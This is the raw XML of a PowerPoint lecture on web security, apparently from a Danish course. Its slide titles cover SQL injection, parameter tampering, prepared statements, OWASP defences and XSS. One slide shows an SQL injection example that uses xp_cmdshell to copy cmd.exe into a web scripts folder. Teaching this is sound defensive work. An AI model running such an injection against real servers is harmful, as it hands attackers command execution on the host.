              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>SQL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>SELECT * FROM products WHERE id=4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>EXEC master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:endParaRPr lang="da-DK" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>		‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>copy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> \winnt\system32\cmd.exe \</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>inetpub\scripts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’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2292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Can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fully</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>automated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0"/>
              <a:t>…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2492896"/>
            <a:ext cx="61468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06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6941</TotalTime>
  <Words>1740</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Skærmshow (4:3)</PresentationFormat>
  <Paragraphs>317</Paragraphs>
  <Slides>33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33</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="34" baseType="lpstr">
      <vt:lpstr>Flow</vt:lpstr>
      <vt:lpstr>PowerPoint-præsentation</vt:lpstr>
      <vt:lpstr>Security update</vt:lpstr>
      <vt:lpstr>Student presentation</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection cont.</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Can be fully automated…</vt:lpstr>
      <vt:lpstr>Parameter Tampering</vt:lpstr>
      <vt:lpstr>Lets try it… (pseudo code)</vt:lpstr>
      <vt:lpstr>PHP - Prepared statement</vt:lpstr>
      <vt:lpstr>What now???</vt:lpstr>
      <vt:lpstr>OWASP primary defenses</vt:lpstr>
      <vt:lpstr>Parameterized Queries</vt:lpstr>
      <vt:lpstr>Parameterized Query example</vt:lpstr>
      <vt:lpstr>Stored procedures</vt:lpstr>
      <vt:lpstr>Parameterized queries</vt:lpstr>
      <vt:lpstr>Lesson learned</vt:lpstr>
      <vt:lpstr>Assignment for next time</vt:lpstr>
      <vt:lpstr>Studen presentation</vt:lpstr>
      <vt:lpstr>XSS – Cross Site Scripting</vt:lpstr>
      <vt:lpstr>Example - nonpersistent</vt:lpstr>
      <vt:lpstr>Users may be suspicious of the link?</vt:lpstr>
      <vt:lpstr>What can we do to prevent it?</vt:lpstr>
      <vt:lpstr>What can we do to prevent it?</vt:lpstr>
      <vt:lpstr>Is HTML encoding enough?</vt:lpstr>
      <vt:lpstr>Is HTML encoding enough?</vt:lpstr>
      <vt:lpstr>Student Presentation</vt:lpstr>
      <vt:lpstr>Student Presentation</vt:lpstr>
      <vt:lpstr>Student presentation</vt:lpstr>
      <vt:lpstr>Mandatory 1 - First individual mandatory assignment</vt:lpstr>
      <vt:lpstr>Till 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Tue</dc:creator>
  <cp:lastModifiedBy>Tue Becher</cp:lastModifiedBy>
  <cp:revision>347</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-12-19T23:20:08Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-03-07T11:13:55Z</dcterms:modified>
</cp:coreProperties>
</file>